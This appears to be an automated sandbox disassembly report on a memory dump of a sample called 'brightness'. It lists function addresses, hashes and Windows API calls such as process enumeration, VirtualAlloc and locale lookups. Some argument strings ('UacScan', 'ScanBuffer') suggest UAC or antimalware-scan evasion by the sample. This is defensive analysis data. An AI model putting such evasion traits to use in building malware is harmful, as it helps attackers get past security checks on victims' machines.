Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
Instruction ID: 496cca2ee4bb1971cd850fe128ec21ebee74d40ac1739a280b71ba672bea8a90
Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
Instruction Fuzzy Hash: 9ED05BBA3081507AE220955E5D44EA75BDCCBC6770F10473EF668C7180E7208C05C671

Function 028F7E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02913891,ScanString,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4,ScanBuffer,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4,Initialize), ref: 028F7E8B

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
Instruction ID: 410dbea8ee59e28dafc556db8139491c86078c2224acd5eb61adb03fe4f06c4e
Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
Instruction Fuzzy Hash: F4C08CFE3112010A2EE0A5FC1CC421A43990984135B601F23EB3CCA2D2F31A98222822

Function 028F7E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02910714,ScanString,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4,ScanString,0294B37C,0291B9D4,UacScan,0294B37C,0291B9D4,UacInitialize), ref: 028F7E67

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
Instruction ID: e49dfbfca35ef0dbe1e4708ede6954e8aac7214e247de2f61e9191a5b3aaba49
Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
Instruction Fuzzy Hash: 70C08CAC3012010A6AD065BC2CC424A538A0D042397640B23AB3CC62E2F32698A32812

Function 028F4C9C Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(0290F798), ref: 028F4C6E
SysReAllocStringLen.OLEAUT32(0291C858,0290F798,000000B4), ref: 028F4CB6

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 60f216499253b9dff2cac0f6af8fdc80ea07a63062dd34f7668bbc85ccb701f1
Instruction ID: 8970a877a86e7547cfdecee89ef00765b2f76f85d2dad22c3a03015662b63dda
Opcode Fuzzy Hash: 60f216499253b9dff2cac0f6af8fdc80ea07a63062dd34f7668bbc85ccb701f1
Instruction Fuzzy Hash: 3AD0127C100149997AEC9A2B9544D37635A9AD020974EE25B9B0EDA254E7359400CA71

Function 028F4C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 028F4C8B

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
Instruction ID: af0a6db11caf88e741c81a036cf46f826f7317f1e83f6ee8e9373668da424d1e
Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
Instruction Fuzzy Hash: A2C012AE60023097FBA19699ACC475363CC9B05295B1500A2D708D7250E374D80046A1

Function 0291C534 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,0291C528,00000000,00000001), ref: 0291C544

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: be7332f96bf935765a868bfb6690e53f21759336605549abc8215cf564dffa66
Instruction ID: bfd07f222a86609d6f9e0c70a2b2de7a643fcab02ed19891de306089d7284fbc
Opcode Fuzzy Hash: be7332f96bf935765a868bfb6690e53f21759336605549abc8215cf564dffa66
Instruction Fuzzy Hash: 45C092F6BD53047EFE10A6A95CC2F2716DDDB09B01F240413B700EE2D1D6F29A104A22

Function 028F4C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 028F4C3F

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
Instruction ID: 1cb7021cf275ed473819465a34e6371c5b4c4e290c818da43a9ecc325871e971
Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
Instruction Fuzzy Hash: 4EB0123D20820955FAD833A20F00733034C0B4028AF8520539F1CC80E4FB21C0119836

Function 028F4C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 028F4C57

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
Instruction ID: 4d9fc28f8c48161be9183dda707974159fc502c1d44b26a97ecc3e4ec0c90a0d
Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
Instruction Fuzzy Hash: DEA022AC0003038AAF8B33AC002002F23333FE03003C8C0E88308CA000EF3B8000AC30

Function 028F15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,028F1A03,?,028F1FC1), ref: 028F15E2

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 23e727740dd29733409228201f154b12ec05dc850751659d98e234e648261104
Instruction ID: d1255ad9d0b0f32b7ce5c0eab834f31f8de13ed642d339095fbebb1788b470f1
Opcode Fuzzy Hash: 23e727740dd29733409228201f154b12ec05dc850751659d98e234e648261104
Instruction Fuzzy Hash: 41F06DF8B563008FDB45DF799D64B117BD2F78A348F108579D609DB388E77584018B00

Function 028F1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,028F1FC1), ref: 028F16A4

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: feff9f2f4b63ad73efe192a1c68859b11218e902a1916260038517a40eae0e9a
Instruction ID: 9946376a05d97941f6ca19765959df8b1f39c339b3bff8d8deff244df5f856a4
Opcode Fuzzy Hash: feff9f2f4b63ad73efe192a1c68859b11218e902a1916260038517a40eae0e9a
Instruction Fuzzy Hash: B1F090BAF84795ABE720DE5A9CA4F92BBE4FB50314F050139EA0C97340D770A8108B94

Function 028F16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,028F1FE4), ref: 028F1704

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 24e83d0a1d93352de9482254527315453a2bd10ffeaba28bb3f4dfe065572c5e
Instruction ID: 9af4478a899cc7058746c64ca12153c503e81287d1a8c2a605519779c24f6c20
Opcode Fuzzy Hash: 24e83d0a1d93352de9482254527315453a2bd10ffeaba28bb3f4dfe065572c5e
Instruction Fuzzy Hash: DCE0867D300301EFD7505A7D5D88B12BBD8EB54654F144475F70DDB245D360E8108B60

Non-executed Functions

Function 0290A9D4 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0290AC5B,?,?,0290ACED,00000000,0290ADC9), ref: 0290A9E8
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0290AA00
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0290AA12
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0290AA24
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0290AA36
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0290AA48
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0290AA5A
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0290AA6C
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0290AA7E
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0290AA90
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0290AAA2
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0290AAB4
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0290AAC6
GetProcAddress.KERNEL32(00000000,Module32First), ref: 0290AAD8
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0290AAEA
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0290AAFC
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0290AB0E

Strings

Heap32Next, xrefs: 0290AA40
Heap32First, xrefs: 0290AA2E
Process32First, xrefs: 0290AA64
Module32Next, xrefs: 0290AAE2
Toolhelp32ReadProcessMemory, xrefs: 0290AA52
Process32Next, xrefs: 0290AA76
Module32First, xrefs: 0290AAD0
Thread32First, xrefs: 0290AAAC
Process32NextW, xrefs: 0290AA9A
Module32FirstW, xrefs: 0290AAF4
kernel32.dll, xrefs: 0290A9E3
Thread32Next, xrefs: 0290AABE
Heap32ListFirst, xrefs: 0290AA0A
Module32NextW, xrefs: 0290AB06
Process32FirstW, xrefs: 0290AA88
CreateToolhelp32Snapshot, xrefs: 0290A9F8
Heap32ListNext, xrefs: 0290AA1C

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: d2f1cd2776fd719a7a008a2baf41a50b30a246d81b68762a40cbd7c814560e01
Instruction ID: c4675db5576f02707833e11e93328a39fa951038ecc1bc2c27949361f83367a9
Opcode Fuzzy Hash: d2f1cd2776fd719a7a008a2baf41a50b30a246d81b68762a40cbd7c814560e01
Instruction Fuzzy Hash: 5031FCB8E84364DFEF50EBB898D4E2577EDAB55704B000A65A611CF285F678D410CF92

Function 028F5908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F5925
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 028F593C
lstrcpynA.KERNEL32(?,?,?), ref: 028F596C
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F59D0
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F5A06
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F5A19
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F5A2B
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F5A37
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6C14,028F0000), ref: 028F5A6B
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6C14), ref: 028F5A77
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 028F5A99

Strings

GetLongPathNameA, xrefs: 028F5933
\, xrefs: 028F5A49
kernel32.dll, xrefs: 028F5920

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: a070a852976cdbbf218550cc40c8bfccfb94d84779db8caf80dcb2c6c9187a87
Instruction ID: ef55a9ec0b2ff20b532f2ff46533530a4c3731897ddfce763f107437defa55c1
Opcode Fuzzy Hash: a070a852976cdbbf218550cc40c8bfccfb94d84779db8caf80dcb2c6c9187a87
Instruction Fuzzy Hash: E3417D7DE00219EFDB50DBE8CC88ADEB3BDAF08340F4445A5A648E7241E7389B548F50

Function 028F5BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028F5BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028F5BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028F5BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028F5C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028F5CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028F5CEB

Strings

Software\Borland\Locales, xrefs: 028F5AFC, 028F5B1A
Software\Borland\Delphi\Locales, xrefs: 028F5B38

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction ID: 996d2483c06f923c6eb36d4cc1bbfc0eedac37928fba04891d7eb72a39e7f425
Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction Fuzzy Hash: E631A77DE4026C6AFB65D6F8CC49FDE77ED9B04380F4401A19709E6181D7789E848FA1

Function 028F7FD4 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 028F7FF5

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
Instruction ID: 83818ab110c470f96b4b89bd2afd59ac9890b3d465d0212380afc60e89504758
Opcode Fuzzy Hash: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
Instruction Fuzzy Hash: BE1112B5E00209AF9B40CF9DC881DAFF7F9FFC9300B54C559A508E7254E6719A018B90

Function 028FA7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA7E2

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
Instruction ID: 9ec6ec7235ab93aa76157bd7675512dbf8743d66c1b7baa8262d148cf78212bc
Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
Instruction Fuzzy Hash: D3E0927D71421817D355A56C9C80EF6735D975C310F00426AAB09C7385FDE19E844AE5

Function 028FB78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,0291D106,00000000,0291D11E), ref: 028FB79A

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: d4e0daec3f88572f64d10e28bb358b5f31165eb693074d63009e82d5560ceb93
Instruction ID: 51ccb443ca7eeda55df60f9067f3c0eabc9cdb8990eff9aa12aa5569b1325b34
Opcode Fuzzy Hash: d4e0daec3f88572f64d10e28bb358b5f31165eb693074d63009e82d5560ceb93
Instruction Fuzzy Hash: 69F0A4789483069FE394DF2AD44162677E9FF49754F004D29EAE8C7380E7349414CB52

Function 028FA810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,028FBE72,00000000,028FC08B,?,?,00000000,00000000), ref: 028FA823

Memory Dump Source

